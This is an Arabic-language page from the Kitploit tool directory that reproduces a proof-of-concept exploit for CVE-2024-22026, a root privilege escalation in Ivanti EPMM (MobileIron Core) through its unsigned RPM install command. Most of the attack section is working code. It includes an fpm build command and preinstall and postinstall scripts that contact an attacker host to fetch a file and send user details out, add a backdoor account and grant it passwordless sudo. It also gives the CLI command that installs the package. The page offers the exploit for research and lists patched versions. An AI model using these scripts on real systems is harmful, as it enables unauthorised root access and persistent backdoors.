Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-22026 — إثبات مفهوم (POC) لاستغلال ثغرة CVE-2024-22026 التي تؤثر على Ivanti EPMM «MobileIron Core» | Kitploit
أدوات/GitHubGitHub/securekomodo/cve-2024-22026
تصعيد الامتيازاتتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالالأوراق والأبحاثالتعلم والتعليم
GitHubsecurekomodo/cve-2024-22026

CVE-2024-22026

إثبات مفهوم (POC) لاستغلال ثغرة CVE-2024-22026 التي تؤثر على Ivanti EPMM «MobileIron Core»

عرض المستودع
154منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-22026

إثبات المفهوم (POC) لثغرة CVE-2024-22026 التي تؤثر على Ivanti EPMM "MobileIron Core" image

CVE-2024-22026 هي ثغرة تصعيد صلاحيات محلية في إصدارات خادم Ivanti EPMM (المعروف سابقًا باسم MobileIron) الأقدم من 12.1.0.0 و12.0.0.0 و11.12.0.1. تتيح هذه الثغرة لمهاجم محلي الحصول على وصول جذر (root) إلى النظام من خلال استغلال عملية تحديث البرامج باستخدام حزمة RPM خبيثة من عنوان URL بعيد.

اقرأ منشور المدونة الكامل للحصول على معلومات تقنية مفصلة: استغلال CVE-2024-22026: الوصول إلى جذر Ivanti EPMM (MobileIron Core)

تفاصيل الثغرة

  • معرف CVE: CVE-2024-22026
  • الخطورة: غير محددة
  • متجه الهجوم: محلي
  • الأثر: تتيح لمهاجم محلي الحصول على وصول جذر
  • الإصدارات المتأثرة: إصدارات خادم Ivanti EPMM (المعروف سابقًا باسم MobileIron) الأقدم من 12.1.0.0 و12.0.0.0 و11.12.0.1
  • توفر التصحيح: تم التصحيح في الإصدارات 12.1.0.0 و12.0.0.0 و11.12.0.1

الاكتشاف

أثناء بحثنا، اكتشفنا أن الجهاز يستخدم الأمر التالي لجلب وتثبيت حزم RPM كمستخدم بصلاحيات منخفضة:

root@kitploit:~
install rpm url <remote url>

الأمر أعلاه هو مجرد غلاف CLI للإجراء التالي الذي يتم تنفيذه بصلاحيات الجذر (root):

root@kitploit:~
/bin/rpm -Uvh *.rpm

لا يفرض أمر rpm الأساسي هذا أي تحقق من التوقيعات أو تصفية لعناوين URL، مما يعني أنه يمكن تثبيت أي حزمة RPM. يسمح ذلك للمهاجم بتزوير وتسليم حزمة RPM خبيثة يمكنها اختراق الجهاز.

إثبات المفهوم (POC) للاستغلال

إنشاء حزمة RPM الخبيثة

يُستخدم الأمر التالي لإنشاء حزمة RPM خبيثة:

root@kitploit:~
fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .

سكريبت ما قبل التثبيت (preinstall.sh)

root@kitploit:~
#!/bin/sh
curl -O http://<attacker_IP>/poc
exit 0

سكريبت ما بعد التثبيت (postinstall.sh)

root@kitploit:~
#!/bin/sh
set -e  # Enable strict error checking

# Report back current user and privilege level
CURRENT_USER=$(whoami | base64)
PRIV_LEVEL=$(id -u | base64)

curl http://<attacker_IP>/poc?user=$CURRENT_USER
curl http://<attacker_IP>/poc?priv=$PRIV_LEVEL

# Create a new root user
if ! useradd -s /bin/sh -m exploit-poc; then
  echo "Failed to add user 'exploit-poc'" >&2
  exit 1
fi

echo "exploit-poc:<redacted_password>" | chpasswd

# Grant root privileges
if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then
  echo "Failed to modify sudoers file" >&2
  exit 1
fi

exit 0

تشغيل أمر CLI لجلب حزمة RPM

لاستغلال الثغرة، سيشغّل المهاجم الأمر التالي في CLI لجلب وتثبيت حزمة RPM الخبيثة:

root@kitploit:~
install rpm url http://<attacker_IP>/ivanti-privesc-13.37-1.i386.rpm

التخفيف

أصدرت Ivanti تصحيحات لمعالجة CVE-2024-22026 في الإصدارات التالية:

  • 12.1.0.0
  • 12.0.0.0
  • 11.12.0.1

إخلاء مسؤولية

هذا المستودع ومحتواه مخصصان لأغراض تعليمية وبحثية فقط. استخدام المعلومات الواردة هنا على مسؤوليتك الخاصة.

تنزيل الأداة